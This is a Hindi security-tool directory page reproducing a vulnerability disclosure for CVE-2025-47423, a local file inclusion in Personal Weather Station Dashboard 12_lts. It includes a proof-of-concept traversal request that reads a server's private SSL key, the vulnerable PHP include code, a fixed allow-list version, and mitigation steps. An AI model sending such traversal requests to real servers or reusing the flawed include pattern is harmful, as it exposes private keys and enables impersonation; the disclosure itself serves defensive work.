Skip to content
KitploitKITPLOIT
उपकरणब्लॉग
जमा करें
उपकरणब्लॉग
जमा करें

हैकिंग, पेनटेस्ट और साइबर सुरक्षा उपकरण आपके सुरक्षा शस्त्रागार के लिए!

Kitploit हैकिंग, साइबर सुरक्षा और पेंटेस्टिंग टूल्स की एक निर्देशिका है। कमजोरियों को खोजने, सिस्टम का विश्लेषण करने, परीक्षण को स्वचालित करने और अपनी सुरक्षा को मजबूत करने के लिए नवीनतम प्रोजेक्ट अपडेट खोजें।

··फ़ीड·संपर्क·गोपनीयता·© 2026 Kitploit

टूल निर्देशिका

श्रेणियाँ

सभी श्रेणियाँ देखें
Loading categories
CVE-2025-47423 — CVE-2025-47423 का विस्तृत खुलासा: Personal Weather Station Dashboard 12_lts में स्थानीय फ़ाइल समावेशन। इसमें PoC, असुरक्षित कोड विश्लेषण, और रक्षात्मक सीखने के लिए सुरक्षित सुधार सिफारिशें शामिल हैं। | Kitploit
उपकरण/GitHubGitHub/haluka92/cve-2025-47423
भेद्यता विश्लेषणशोषणवेब एप्लिकेशन शोषणपेपर और शोधलर्निंग और शिक्षाचयनित संसाधन
GitHubhaluka92/cve-2025-47423

CVE-2025-47423

CVE-2025-47423 का विस्तृत खुलासा: Personal Weather Station Dashboard 12_lts में स्थानीय फ़ाइल समावेशन। इसमें PoC, असुरक्षित कोड विश्लेषण, और रक्षात्मक सीखने के लिए सुरक्षित सुधार सिफारिशें शामिल हैं।

रिपॉजिटरी देखें
1 महीना पहलेअभी तक समीक्षित नहीं

सबसे लोकप्रिय

सभी देखें →

हमारे समुदाय द्वारा सबसे अधिक उपयोग किए जाने वाले उपकरण खोजें।

सभी उपकरण खोजें

हमारे उपकरणों का संग्रह ब्राउज़ करें

सभी उपकरण देखें →
साझा करें

CVE-2025-47423 – व्यक्तिगत मौसम स्टेशन डैशबोर्ड (12_lts) में स्थानीय फ़ाइल समावेशन

खोजकर्ता: मैथ्यू ईगल
स्थिति: सार्वजनिक प्रकटीकरण
रिपोर्ट तिथि: 2025-05-05
CVE ID: CVE-2025-47423


🧩 सारांश

Personal Weather Station Dashboard संस्करण 12_lts में एक स्थानीय फ़ाइल समावेशन (LFI) भेद्यता, अनधिकृत दूरस्थ हमलावरों को सर्वर पर मनमानी फ़ाइलें पढ़ने की अनुमति देती है। इस दोष का शोषण करने से निजी SSL कुंजियों सहित संवेदनशील फ़ाइलों तक पहुँच मिलती है, जो संभावित रूप से HTTPS कनेक्शनों की गोपनीयता और अखंडता से समझौता कर सकती है।


🛠 प्रभावित घटक

  • फ़ाइल: /others/_test.php
  • संवेदनशील पैरामीटर: test (GET के माध्यम से)

📈 प्रभाव

यह दोष दूरस्थ हमलावरों को अनुमति देता है:

  • फ़ाइल सिस्टम पर मनमानी फ़ाइलें पढ़ना
  • निजी SSL कुंजियाँ (जैसे, server.key) उजागर करना
  • मैन-इन-द-मिडिल (MITM) हमले करना
  • HTTPS सर्वर का प्रतिरूपण करना

CVSS: 5.8 मध्यम


💥 प्रूफ ऑफ कॉन्सेप्ट (PoC)

root@kitploit:~
GET /others/_test.php?test=../../../apache/conf/ssl.key/server.key HTTP/1.1
Host: www.example.com

प्रतिक्रिया:

root@kitploit:~
-----BEGIN RSA PRIVATE KEY-----
MIIEowIBAAKCAQEAs2omMqKSB+lm7xu9Nu3C5...
...TRUNCATED...
-----END RSA PRIVATE KEY-----

🧪 संवेदनशील कोड (सरलीकृत)

root@kitploit:~
$script = trim($_GET['test']);
$script = str_replace('../','',$script);
include($script);

str_replace निर्देशिका ट्रैवर्सल को रोकने के लिए पर्याप्त नहीं है।


🔐 सुरक्षित सुधार

  • शामिल करने के लक्ष्यों के लिए सख्त अनुमति सूची का उपयोग करें
  • basename() के साथ इनपुट को स्वच्छ करें और अनुमत फ़ाइलों के विरुद्ध जाँच करें
  • उपयोगकर्ता इनपुट पर आधारित गतिशील समावेशन से बचें
root@kitploit:~
$allowed_tests = ['index.php', 'module_test.php'];
$script = isset($_GET['test']) ? basename($_GET['test']) : 'index.php';

if (!in_array($script, $allowed_tests)) {
    die("Invalid test file.");
}

include(__DIR__ . '/scripts/' . $script);

📅 समयरेखा

तिथिघटना
2025-05-05भेद्यता PWS डैशबोर्ड मॉडरेटर्स को रिपोर्ट की गई
2025-05-06स्वीकृति और परीक्षण देखा गया
2025-05-07MITRE के माध्यम से CVE-2025-47423 आरक्षित
TBDसार्वजनिक पैच और CVE सूचीकरण लंबित

🧠 शमन

यदि आप Personal Weather Station Dashboard 12_lts चला रहे हैं, तो आपको:

  • तुरंत _test.php को हटाएँ या अपडेट करें
  • फ़ाइल अनुमति सूची के साथ सुधारित स्क्रिप्ट लागू करें
  • किसी भी समझौता किए गए TLS प्रमाणपत्रों को घुमाएँ और पुनः जारी करें

🧾 संदर्भ

  • MITRE पर CVE-2025-47423 (लंबित)
  • GitHub पर पोस्ट की गई सलाह

🙏 श्रेय

भेद्यता की खोज और जिम्मेदारीपूर्वक प्रकटीकरण मैथ्यू ईगल द्वारा
संपर्क: [email protected]


प्रकटीकरण जिम्मेदार प्रकटीकरण दिशानिर्देशों के अनुपालन में समन्वित किया गया। यह दस्तावेज़ शैक्षिक और रक्षात्मक उद्देश्यों के लिए जारी किया गया है।

टूल डाउनलोड करें